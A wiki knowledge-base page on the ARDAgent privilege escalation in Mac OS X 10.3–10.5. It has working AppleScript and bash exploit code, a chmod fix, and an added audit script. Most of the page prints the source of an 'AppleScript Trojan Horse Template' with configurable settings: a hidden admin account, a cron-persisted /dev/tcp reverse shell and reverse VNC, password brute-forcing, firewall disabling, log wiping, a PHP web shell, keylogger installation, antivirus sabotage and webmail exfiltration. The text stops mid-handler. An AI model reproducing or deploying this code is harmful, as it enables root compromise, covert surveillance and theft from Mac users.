ARDAgent exploit
From MacShadows KB
The ARDAgent exploit is a root privilege escalation using AppleScript. It takes advantage of lax permissions on the ARDAgent executable, which is installed with Mac OS X 10.3 (when the Apple Remote Desktop client has been installed) through Mac OS X 10.5 (both OS X 10.4 and 10.5 include the Apple Remote Desktop client). The ARDAgent vulnerability is currently not patched. Apple Remote Desktop need not be active, nor ever have been active, for the exploit to succeed: when ARDAgent is told to 'do shell script' it is loaded even if it was not running. The ARDAgent executable is owned by the root user account and is setuid, so the ARDAgent process can be owned by root when launched. This is clearly not the intended behavior, as it is generally launched as a process owned by the current user. The 'do shell script' command, when passed to ARDAgent, will not always succeed, nor will it always be run with root privileges; however, repeating the command eventually results in a successful exploit of the vulnerability.
Discovery
The discovery of this exploit is credited to members of TheSharedForums. Following its initial posting and confirmation in the thread, several members including lokin, callmenames, Oktane, andrewistheshit, and Wawl began a collaborative effort to create proof-of-concept software exploiting this vulnerability, one of which was the AppleScript Trojan Horse Template, a.k.a. "AppleScript.tht" or AS.tht as dubbed by security profiteers.
Usage
AppleScript
--This is a comment, comments begin with two consecutive hyphens
--The next part below is a handler a.k.a. a subroutine
on ARDAgentize(command)
try
--Self explanatory?
tell application "ARDAgent" to do shell script command
on error
--Kill ARDAgent if its already running as the user
do shell script "kill $( ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }' ) ; exit 0"
--restart this handler
ARDAgentize(command)
end try
end ARDAgentize
--This statement runs the handler and passes it the shell command "id"
ARDAgentize("id")
Bash script (Bourne Again Shell)
Just paste the next line into Terminal, then click back in the Terminal window and press return:
function ARDA() { osascript -e 'tell app "ARDAgent" to do shell script "id"' || (kill $(ps -xcu ${USER} | grep ARDAgent | awk '{ print $2 }') ; ARDA ); } ; ARDA
Sample output of either the AppleScript or the shell command line:
uid=0(root) gid=501(angel) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
The root account which has user ID zero (uid 0) generally has unrestricted access to processes, commands and files.
Solutions
Don't download and run software from untrusted sources and keep in mind that even software from trusted sources can accidentally destroy your data. Back up your data regularly, ideally to media which are not kept connected to the system and are read-only.
For the ARDAgent vulnerability itself, remove the setuid bit from the executable's permissions.
Shell command:
sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
You will be prompted for your password. Note that this change will be undone by repairing permissions with Disk Utility, or with diskutil from the command line, so check the bit again after any permissions repair.
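As an added example (not from the original page), a POSIX shell audit that reports whether the ARDAgent binary still carries the setuid bit, optionally clears it, and re-verifies. The default ARDAGENT path is the one given above; the function names are assumptions, and the path is taken as an argument so the same functions can be re-run after a permissions repair or pointed at a test file.

```shell
#!/bin/sh
# Added example: audit and clear the setuid bit on ARDAgent.
# Default path is the one from the mitigation above; override with ARDAGENT=...
ARDAGENT="${ARDAGENT:-/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent}"

# setuid_state FILE
#   exit 0 if FILE exists and has the setuid bit set (the exploitable state),
#   exit 1 if FILE exists without setuid, exit 2 if FILE is missing.
setuid_state() {
    [ -e "$1" ] || return 2
    [ -u "$1" ] && return 0
    return 1
}

# owner_of FILE: print the owning user name (ls is POSIX; stat flags differ by OS).
owner_of() {
    ls -ld "$1" | awk '{ print $3 }'
}

# clear_setuid FILE: chmod u-s, then re-check. Returns 0 only if the bit is gone.
clear_setuid() {
    chmod u-s "$1" || return 1
    rc=0
    setuid_state "$1" || rc=$?
    [ "$rc" -eq 1 ]
}

# audit FILE [fix]: print a one-line verdict; pass "fix" as the second argument
# to clear the bit. Always exits 0 so it is safe to call from cron or a login script.
audit() {
    rc=0
    setuid_state "$1" || rc=$?
    case "$rc" in
        2) echo "MISSING  $1 (Apple Remote Desktop client not installed?)" ;;
        1) echo "OK       $1 (no setuid bit)" ;;
        0) echo "SETUID   $1 owned by $(owner_of "$1"): root-owned setuid ARDAgent is exploitable"
           if [ "$2" = "fix" ]; then
               if clear_setuid "$1"; then
                   echo "FIXED    $1 (re-run this audit after any permissions repair)"
               else
                   echo "FAILED   could not clear setuid on $1 (run as root or via sudo)"
               fi
           fi ;;
    esac
    return 0
}

# Report on the real binary; "sh audit.sh fix" clears the bit when run with privileges.
audit "$ARDAGENT" "$1"
```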
AppleScript Trojan Horse Template
The script source is shown below.
---------------------------------------------------------------------------
--AppleScript trojan horse template (incomplete, still in progress v0.6 posted)
---------------------------------------------------------------------------
--Written & tested with AppleScript 1.10.7 on Mac OS X 10.4.11 PPC
---------------------------------------------------------------------------
--Variables
--------------------
global masters_email_address, padlock_icon, software_update_icon, be_quiet, OSX_hashes, OSX_version_number_major, OSX_version_number_minor, OSX_version_number_mini, i_am_an_admin, i_have_root_access, my_username, my_password, my_Path, my_POSIX_folder, my_folder, my_name, launch_path, SystemLoginItems, hidden_admin_username, hidden_admin_password, hidden_admin_password_hash, ip_addresses, move_myself, my_resources, all_else_fails, phpshell_path, candidates_file, target_DDNS_username, target_DDNS_password, target_DDNS_id, target_DDNS_update_URL, masters_DDNS_address, accounts_file, debug, masters_netcat_port, masters_VNC_port, hashes_file, secret_file, key1, key2, webmail_command_line, the_message, the_title, webmail_success_response_term
--###############################################--
--########### HEY! You might want to change these? ###########--
--###############################################--
--These are the tr keys for fuxor and defuxor
set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
--The secret file filename
set secret_file to ".howdy"
set the_title to "Howdy"
--The following variables WILL be changed to the values found in the plist file if the plist file exists
--Which means if you change them within this script, delete the plist file
--If you use the plist file, don't bother changing the value in this script
--debug, hidden_admin_password, hidden_admin_username, masters_DDNS_address, masters_email_address, masters_netcat_port, masters_VNC_port, target_DDNS_id, target_DDNS_password, target_DDNS_update_URL, target_DDNS_username, webmail_command_line, webmail_success_response_term
set debug to true
--The name and password to use with the hidden admin account to be created
set hidden_admin_password to "a secret"
set hidden_admin_username to "nobodyd"
--For the reverse_shell
--Enter *your* Dynamic DNS address for the reverse-shell to connect to you
--Don't forget to update your DDNS record with your current IP if your IP is not static
set masters_DDNS_address to "localhost"
--Your email address for the outgoing mail to you
set masters_email_address to "emailname%40emaildomain.com"
--Whether or not to relocate the trojan away from where it was run
set move_myself to true
--Port number for connect-backs, reverse-shell etc.
set masters_netcat_port to "6880"
set masters_VNC_port to "6879"
--For the target's / victim's Dynamic DNS address so that you can get their IP address even if the outgoing email fails
set target_DDNS_id to "DDNS id"
set target_DDNS_password to "DDNS password"
set target_DDNS_username to "" --Leave this blank if you aren't using a DDNS service to track the target computer.
--You may need to adjust this for different DDNS service providers
set target_DDNS_update_URL to "http://www.sitelutions.com/dnsup?user=" & target_DDNS_username & "&pass=" & target_DDNS_password & "&id=" & target_DDNS_id & "&detectip=1"
set webmail_command_line to "curl -d 'hdnSendMail=sendNow&To=<<MASTERS_EMAIL_ADDRESS>>&CC=&BCC=&Subject=<<THE_TITLE>>&Message=<<THE_MESSAGE>>&btnSend=Send' www.employeesuggestions.com/form.asp 2>/dev/null | grep '<<SUCCESS_RESPONSE_TERM>>'"
set webmail_success_response_term to "Your anonymous suggestion has been sent"
--###############################################--
--###### end of the 'HEY! You might want to change these?' stuff ######--
--###############################################--
--You probably shouldn't change these.
set padlock_icon to 2
set software_update_icon to 0
set be_quiet to true
set OSX_hashes to ""
set OSX_version_number_major to do shell script "sw_vers -productVersion | cut -d '.' -f 1"
set OSX_version_number_minor to do shell script "sw_vers -productVersion | cut -d '.' -f 2"
set OSX_version_number_mini to do shell script "sw_vers -productVersion | cut -d '.' -f 3"
set SystemLoginItems to ""
set i_am_an_admin to false
set i_have_root_access to false
set my_username to system attribute "USER"
set my_password to ""
set ip_addresses to ""
set my_Path to POSIX path of (path to me)
set my_POSIX_folder to (do shell script "dirname " & quoted form of my_Path) & "/"
set my_folder to (POSIX file my_POSIX_folder) --unused at present
set my_name to do shell script "basename \"" & my_Path & "\""
copy my_Path to launch_path
set my_resources to my_Path & "Contents/Resources/"
set phpshell_path to my_Path & "Contents/Resources/phpshell-2.1/"
set candidates_file to "/Users/Shared/SC Info/.candidates"
set accounts_file to "/Users/Shared/SC Info/.accounts"
set hashes_file to "/Users/Shared/SC Info/.hashes"
set all_else_fails to false
--Get the padlock icon
try
--You could place a copy of the icns file(s) within your application bundle, then change this path.
--Note that it will not work from Script Editor and will work from your finished app.
set padlock_icon to POSIX file ("/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns" as text)
end try
--Get the Software Update icon
try
set software_update_icon to POSIX file ("/System/Library/CoreServices/Software Update.app/Contents/Resources/Software Update.icns" as text)
end try
---------------------------------------------------------------------------
--Handlers
--------------------
on read_my_plist()
--If my plist file exists, read settings from my plist file and use those instead of settings previously set in this script
--If anyone knows of a method for indirect variable assignment in AppleScript, let me know! :)
local tempvar
if debug then log_event("read_my_plist")
if (do shell script "[ -f " & quoted form of my_resources & "com.AStht.config.plist ] && echo 'true' || echo 'false'" as text) is "true" then
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config debug"
if tempvar is "0" then set debug to false
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_password"
if tempvar is not "" then set hidden_admin_password to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config hidden_admin_username"
if tempvar is not "" then set hidden_admin_username to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_DDNS_address"
if tempvar is not "" then set masters_DDNS_address to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_email_address"
if tempvar is not "" then set masters_email_address to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_netcat_port"
if tempvar is not "" then set masters_netcat_port to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config masters_VNC_port"
if tempvar is not "" then set masters_VNC_port to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_id"
if tempvar is not "" then set target_DDNS_id to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_password"
if tempvar is not "" then set target_DDNS_password to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_update_URL"
if tempvar is not "" then set target_DDNS_update_URL to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config target_DDNS_username"
if tempvar is not "" then set target_DDNS_username to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_success_response_term"
if tempvar is not "" then set webmail_success_response_term to tempvar
set tempvar to do shell script "defaults read " & quoted form of my_resources & "com.AStht.config webmail_command_line"
if tempvar is not "" then set webmail_command_line to tempvar
else
if debug then log_event("read_my_plist: plist not found")
end if
end read_my_plist
on i_have_a_secret()
--This routine gathers, sorts and uniques data from the various hidden files and creates a new secret_file,
--then copies it to several locations which may be easily accessible.
if debug then log_event("i_have_a_secret")
try
do shell script "cat " & quoted form of secret_file & " " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " | tr '\\r' '\\n' | sort -u > /var/tmp/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f /var/tmp/" & quoted form of secret_file & "] && mv /var/tmp/" & quoted form of secret_file & " ~/Public/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "chmod 777 ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " ~/Sites/images/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "[ -f ~/Public/" & quoted form of secret_file & "] && cp ~/Public/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
end try
end i_have_a_secret
on log_event(append_this)
local append_this
do shell script ("echo \"$(date '+%y/%m/%d %H:%M:%S'), OS:" & OSX_version_number_major & "." & OSX_version_number_minor & "." & OSX_version_number_mini & ", AS:" & (version of AppleScript as text) & ", " & my_Path & " V:0.5 -- " & append_this & "\" >> /Users/Shared/.AStht.log")
end log_event
on Back_to_masters_VNC()
if debug then log_event("back_to_masters_VNC")
local Rvnc, the_process, crontent
try
do shell script "test -x /Users/Shared/.OSXvnc-server || cp \"" & my_resources & "Vine Server.app/Contents/Resources/OSXvnc-server\" /Users/Shared/.OSXvnc-server"
end try
set Rvnc to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
if [ -z \"$( lsof -i:" & masters_VNC_port & " | grep ESTABLISHED | grep OSXvnc )\" ]
then
the_process=$( ps -auxwww | grep -i OSXvnc-server | grep -v grep | tr -s ' ' | cut -d ' ' -f 2 )
[ \"x${the_process}\" != \"x\" ] && kill -9 \"${the_process}\"
fi
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec /Users/Shared/.OSXvnc-server -connectHost ${address} -connectPort " & masters_VNC_port & " &
exit 0"
--Output the shell script to handle the OSXvnc-server reverse connection
do shell script "echo " & quoted form of Rvnc & " > /Users/Shared/.Rvnc; chmod 777 /Users/Shared/.Rvnc"
--Set a crontask to run the script every hour at 15 minutes past the hour
set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "15" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rvnc 2>/dev/null")
set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
do shell script "crontab /var/tmp/cronappend"
do shell script "rm /var/tmp/cronappend"
end Back_to_masters_VNC
on brute_user_accounts()
--Attempt to brute-force passwords for the user accounts on this computer. This is not too speedy but if everything is else is done, I have nothing but time.
if debug then log_event("brute_user_accounts")
local the_users, the_passwords, the_username, the_password
set the_users to {do shell script "dscl . -list /Users | while read username; do passwd=$( dscl . -read /Users/${username} passwd | cut -d ' ' -f 2 ); [ \"${passwd}\" != '*' ] && echo ${username}; done; exit 0"}
set the_passwords to {"password" & return & "admin" & return & "1234" & return}
try
set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null; exit 0")}
end try
set the_passwords to {do shell script "echo '" & the_passwords & return & the_users & return & return & "' | tr '\\r' '\\n' | sort -u "}
repeat with the_username in the_users
repeat with the_password in the_passwords
try
do shell script "expect -c 'spawn su " & the_username & "' -c 'expect Password: {send " & the_password & "\\n}' -c 'send id\\n' -c 'send exit\\n' -c 'expect eof' | grep uid"
do shell script "echo " & the_username & ":" & the_password & " >> " & quoted form of accounts_file
exit repeat
end try
end repeat
end repeat
end brute_user_accounts
on reverse_shell()
if debug then log_event("reverse_shell")
local Rshell, the_process, crontent
set Rshell to "#!/bin/bash
[ -n \"$( ps -axww | grep -i 'lsd" & (ASCII character 92) & (ASCII character 124) & "Snitch' | grep -v grep )\" ] && exit 0
address=$( host " & masters_DDNS_address & " | sed -e 's/^.*address //' -e 's/ .*//' | grep -v [:alpha:] )
exec 6<>/dev/tcp/${address}/" & masters_netcat_port & " || exit 0
id >&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
cat <&6 | while read input
do
$input >&6 2>&6
echo -n \"${USER}@${HOSTNAME} > \" >&6
done
exit 0"
--Output the shell script to handle the bash reverse-shell
do shell script "echo " & quoted form of Rshell & " > /Users/Shared/.Rshell; chmod 777 /Users/Shared/.Rshell"
--Set a crontask to run the script every hour at 5 minutes past the hour
set crontent to ((do shell script "crontab -l 2>/dev/null; exit 0") & return & "5" & tab & "*/1" & tab & "*" & tab & "*" & tab & "*" & tab & "/bin/bash /Users/Shared/.Rshell 2>/dev/null")
set crontent to do shell script "echo '" & crontent & "' | tr '\\r' '\\n' | sort -rnu > /var/tmp/cronappend"
do shell script "crontab /var/tmp/cronappend"
do shell script "rm /var/tmp/cronappend"
end reverse_shell
on its_smoky_in_here_lets_open_ports_in_the_firewall()
--This handler is best run by root (but may disable the firewall in the preference file with only admin access, firewall won't be off until restart.)
if debug then log_event("its_smoky_in_here_lets_open_ports_in_the_firewall")
--A member of the admin group may already have write access to the file without the use of sudo. Try this first.
try
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
do shell script "defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
end try
if i_have_root_access then
try
--for ipfw
do shell script "/usr/bin/sudo /sbin/ipfw disable firewall" --stop ipfw if it is running
end try
--Modify the plist files to disable the firewall on startup
--admin access is required, sudo actually isn't but I'll need it if I'm not an admin
try
--FirewallTool complains (in 10.4 at least) if the next four items aren't these exact types
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall state -bool false"
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall loggingenabled -int 0"
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall stealthenabled -int 0"
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.sharing.firewall udpenabled -int 0"
--for Leopard 10.5, won't hurt anything on prior systems
do shell script "/usr/bin/sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0"
end try
end if
end its_smoky_in_here_lets_open_ports_in_the_firewall
on throw_another_log_on_the_fire()
if debug then log_event("throw_another_log_on_the_fire")
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Call nothing_to_see_here to stop logging first.
--Then this handler to clean the logs...
try
--Just delete utmp and wtmp for now, still need to write a cleaning routine
do shell script "/usr/bin/sudo rm /var/run/utmp /var/run/utmpx /var/log/wtmp /var/log/wtmpx 2>/dev/null"
end try
try
do shell script "exec /usr/bin/sudo bash <<< 'for log in /var/log/system.log /var/log/secure.log /var/log/ftp.log /var/log/asl.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/lastlog /Library/Logs/AppleFileService/AppleFileService*.log /Library/Logs/Console/*/console.log; do [ -f ${log} ] && { sed -e \"/[Ff][Rr][Oo][Mm]/d\" -e \"/client/d\" -e \"/[Ll]og[Kk]ext/d\" -e \"/" & my_username & "/d\" ${log} > ${log}.tmp && mv ${log}.tmp ${log}; }; done' "
end try
end throw_another_log_on_the_fire
on nothing_to_see_here()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("nothing_to_see_here")
try
--Disable logging
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
--For Tiger & Leopard
do shell script "/usr/bin/sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.syslogd.plist"
else if OSX_version_number_minor as number ≥ 2 and OSX_version_number_minor as number ≤ 3 then
--For Panther and Jaguar
do shell script "/usr/bin/sudo killall syslogd"
else
--for Puma and Cheetah
do shell script "myoutput=`/bin/ps -axww | grep syslogd | grep -v grep | sed -e 's/^ *//' -e 's/ .*//'`; [ -n \"${myoutput}\" ] && /usr/bin/sudo kill \"${myoutput}\""
end if
end try
try
--Stop system accounting
do shell script "/usr/bin/sudo /usr/sbin/accton"
do shell script "/usr/bin/sudo rm /var/account/acct"
end try
try
--Change syslog.conf
do shell script "/usr/bin/sudo mv /etc/syslog.conf /etc/syslog.conf.AStht; /usr/bin/sudo sed -e 's_/var/log/secure.log_/dev/null_' -e 's_/var/log/ftp.log_/dev/null_' /etc/syslog.conf.AStht > /var/tmp/syslog.conf && /usr/bin/sudo mv -f /var/tmp/syslog.conf /etc/syslog.conf && /usr/bin/sudo touch -r /etc/syslog.conf.AStht /etc/syslog.conf 2>/dev/null"
end try
try
--Change logging settings in /Library/Preferences/com.apple.AppleFileServer.plist
do shell script "exec /usr/bin/sudo bash <<< 'cp /Library/Preferences/com.apple.AppleFileServer.plist /Library/Preferences/com.apple.AppleFileServer.plist.AStht; defaults write /Library/Preferences/com.apple.AppleFileServer activityLog -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer activityLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer errorLogPath -string /dev/null; defaults write /Library/Preferences/com.apple.AppleFileServer admin31GetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer adminGetsSp -bool No; defaults write /Library/Preferences/com.apple.AppleFileServer allowRootLogin -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer specialAdminPrivs -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer autoRestart -bool Yes; defaults write /Library/Preferences/com.apple.AppleFileServer loggingAttributes \"<dict><key>logCreateDir</key><false/><key>logCreateFile</key><false/><key>logDelete</key><false/><key>logLogin</key><false/><key>logLogout</key><false/><key>logOpenFork</key><false/></dict>\"'"
end try
end nothing_to_see_here
on install_phpshell()
--This handler is best run by root (but can install to a user home folder without admin or root.)
--PHPshell version 2.1 http://sourceforge.net/projects/phpshell
if debug then log_event("install_phpshell")
if OSX_version_number_minor as number ≥ 1 then
--OS X 10.0 did not include PHP
if i_have_root_access then
--Place the PHPshell folder (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
--Hopefully you remembered to add a user such as any of the following to PHPshell's config.php?
--nobodyd = "md5:54889c9:45caff28b8f9340ccb43f9f61d72b2a3"
--nobodyd = "sha1:527faf43:8a60cb4d7d16b6df77ebf01bcd6a8c98c6ab10d9"
--nobodyd = "a secret"
try
--Check if the file /Library/WebServer/Documents/.PS_Store/phpshell.php is already there
--and if not, copy the contents of the PHPShell directory from within my application bundle
--into /Library/WebServer/Documents/.PS_Store/
do shell script "test -f /Library/WebServer/Documents/.PS_Store/phpshell.php || /usr/bin/sudo mkdir -p -m 777 /Library/WebServer/Documents/; /usr/bin/sudo cp -R " & quoted form of phpshell_path & " /Library/WebServer/Documents/.PS_Store/"
end try
try
--Enable PHP4 support in /etc/httpd/httpd.conf
do shell script "/usr/bin/sudo mv -f /etc/httpd/httpd.conf /etc/httpd/httpd.conf.AStht; /usr/bin/sudo sed -e 'sO# *LoadModule php4_module *libexec/httpd/libphp4.soOLoadModule php4_module libexec/httpd/libphp4.soO' -e 'sO# *AddType application/x-httpd-php .phpOAddType application/x-httpd-php .phpO' -e 'sO# *AddType application/x-httpd-php-source .phpsOAddType application/x-httpd-php-source .phpsO' -e 'sO# *AddModule mod_php4.cOAddModule mod_php4.cO' /etc/httpd/httpd.conf.AStht > /var/tmp/httpd.conf && /usr/bin/sudo mv -f /var/tmp/httpd.conf /etc/httpd/httpd.conf && /usr/bin/sudo touch -r /var/tmp/httpd.conf /etc/httpd/httpd.conf 2>/dev/null"
end try
else
--If I don't have root access then I'll install PHPShell into /Library/WebServer/Documents, try ~/Sites
do shell script "test -d ~/Sites/ && { test -f ~/Sites/images/.PS_Store/phpshell.php || mkdir -p ~/Sites/images 2>/dev/null && cp -R " & quoted form of phpshell_path & " ~/Sites/images/.PS_Store/; chgrp -Rf admin ~/Sites/; }"
end if
end if
--You might also want to call enable_webserver()
end install_phpshell
on enable_webserver()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--This enables "Personal Web Sharing" and opens the web sharing ports in the firewall under Mac OS X 10.4 Tiger
if debug then log_event("enable_webserver")
try
--Set "WEBSERVER=-YES-" in /etc/hostconfig
do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht && /usr/bin/sudo sed -e 's/WEBSERVER=-NO-/WEBSERVER=-YES-/' /etc/hostconfig.AStht > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
end try
try
--Check /etc/hostconfig one more time and if "WEBSERVER=-YES-" isn't there, just append it.
do shell script "grep 'WEBSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'WEBSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht /etc/hostconfig 2>/dev/null"
end try
try
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist"
on error
do shell script "/usr/bin/sudo apachectl restart 2>/dev/null; exit 0"
end try
--/System/Library/LaunchDaemons org.apache.httpd.plist for leopard -- includes "SHAuthorizationRight" ?
end enable_webserver
on enable_Personal_File_Sharing()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("enable_Personal_File_Sharing")
try
--Set "AFPSERVER=-YES-" in /etc/hostconfig
do shell script "/usr/bin/sudo mv -f /etc/hostconfig /etc/hostconfig.AStht2 && /usr/bin/sudo sed -e 's/AFPSERVER=-NO-/AFPSERVER=-YES-/' /etc/hostconfig.AStht2 > /var/tmp/hostconfig && /usr/bin/sudo mv /var/tmp/hostconfig /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
end try
try
--Check /etc/hostconfig one more time and if "AFPSERVER=-YES-" isn't there, just append it.
do shell script "grep 'AFPSERVER=-YES-' /etc/hostconfig || /usr/bin/sudo echo 'AFPSERVER=-YES-' >> /etc/hostconfig && /usr/bin/sudo touch -r /etc/hostconfig.AStht2 /etc/hostconfig 2>/dev/null"
end try
try
do shell script "/usr/bin/sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.AppleFileServer.plist"
on error
do shell script "/usr/bin/sudo /usr/sbin/AppleFileServer 2>/dev/null; exit 0"
end try
end enable_Personal_File_Sharing
on install_and_activate_logKext()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--logKext version 2.2 http://logkext.googlecode.com/files/logKext.pkg.zip
--This version of logKext is only for 10.4 and 10.5 and it is UB
if debug then log_event("install_and_activate_logKext")
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
try
--Place a copy of logKext.pkg (unzipped) inside the Resources folder within your script bundle (or inside Script Editor if you aren't saving as an app)
do shell script "[ -f /Library/Preferences/com.fsb.logKext ] && exit 0; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext-1.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkext.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextclient.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextdaemon.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeygen.pkg/\"; /usr/bin/sudo installer -target / -lang en -pkg \"" & my_resources & "/logKext.pkg/Contents/Packages/logkextkeymap.pkg/\""
on error error_message number error_number
if debug then log_event("install_and_activate_logKext:ERROR #" & error_number & " " & error_message)
--logKext wasn't installed, perhaps the path to the logKext package within my application bundle is incorrect?
end try
--Tell Spotlight not to index the files in /Library/Preferences
do shell script "sudo defaults write /.Spotlight-V100/_exclusions EXCLUSIONS -array-add /Library/Preferences"
end if
end install_and_activate_logKext
on there_are_no_osx_viruses_silly_wabbit()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
--Tested with an older version of NAVLU. Hmm, not sure about file's write permissions...
if debug then log_event("there_are_no_osx_viruses_silly_wabbit")
try
do shell script "if [ -f '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' ]; then /usr/bin/sudo sed 's_://_://127.0.0.1/_'' '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf' > /var/tmp/lu.tmp; /usr/bin/sudo mv /var/tmp/lu.tmp '/Library/Application Support/Norton Solutions Support/LiveUpdate/liveupdate.conf'"
end try
--Still to do, newer NAV, Virex, etc.
--Perhaps modify the /etc/hosts file
end there_are_no_osx_viruses_silly_wabbit
on i_like_you_just_as_you_are()
--Disables update checking for the current user ~/Library/Preferences/com.apple.scheduler.plist
if debug then log_event("i_like_you_just_as_you_are")
do shell script "softwareupdate --schedule off 2>/dev/null; exit 0"
end i_like_you_just_as_you_are
on quit
--ignore any user attempts to quit this program
if debug then log_event("quit handler")
end quit
on agent_86_reporting_for_duty_chief()
--This handler needs root! (We either need to be running as root, from SystemLoginItems for instance, or sudo needs to be within the timestamp period!)
if debug then log_event("agent_86_reporting_for_duty_chief")
set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"
if OSX_version_number_minor as number ≥ 4 then --For Tiger and Leopard
try
--see if our user is already there
do shell script "dscl . -read /Users/" & hidden_admin_username
on error number 71 -- "read invalid path"
--if not, then add our user.
